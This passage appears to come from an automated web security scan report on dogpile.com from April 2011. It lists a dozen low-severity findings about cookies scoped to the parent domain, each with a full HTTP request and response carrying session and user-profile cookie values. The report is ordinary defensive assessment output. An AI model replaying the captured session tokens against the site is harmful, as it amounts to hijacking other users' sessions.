Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:53 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dailydealfetcher.com
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:13 GMT
Connection: Keep-Alive
Content-Length: 1216
Vary: Accept-Encoding, User-Agent

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dailydealfetcher.com">here</a>.</h2>
</body></html>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tra
...[SNIP]...

6.5. http://www.dogpile.com/dogpile/ws/about/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/about/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/about/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=136fb87258794bf0868fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:26 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:26 GMT
Connection: close
Content-Length: 44997
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.6. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=530d17a155f848679bfdc16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=bfbe830ac1c64c0a810fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:24 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:24 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:24 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 44993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.7. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/contactus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8bf114849f6a409d9c06c16a3af0cb01&ActionId=2d7a6054427c4593a5ccc16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=51412009a454492dac79c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:53 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:53 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:12:52 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.8. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f4a5e3c498ee4fafa621c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=ba008f1978f546de8f2dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:31 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.9. http://www.dogpile.com/dogpile/ws/faq/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/faq/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/faq/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a7a7c2c92e274276a8b4c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:25 GMT
Connection: close
Content-Length: 64207
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.10. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:13:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f1bd779c38af4c89afa5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:20 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:20 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.11. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=367df53625864920a346c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:46 GMT
Connection: close
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true">he
...[SNIP]...

6.12. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2f68f4b83d774f748c89c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:42 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:42 GMT; path=/
Set-Cookie: wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301677062725; path=/
Set-Cookie: wsRecent=april+fools+day+pranks,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:43 GMT
Connection: close
Content-Length: 159749
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.13. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c7d0fe76335d40769068c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:05 GMT
Connection: close
Content-Length: 45381
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.14. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d323fe3be73453a893dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:24 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:24 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:24 GMT
Connection: close
Content-Length: 45381
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.15. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7bf15bbd815545118e35c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:26 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:26 GMT
Connection: close
Content-Length: 40937
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.16. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d276184e64f54d5b98bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:33 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:33 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:32 GMT
Connection: close
Content-Length: 42133
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

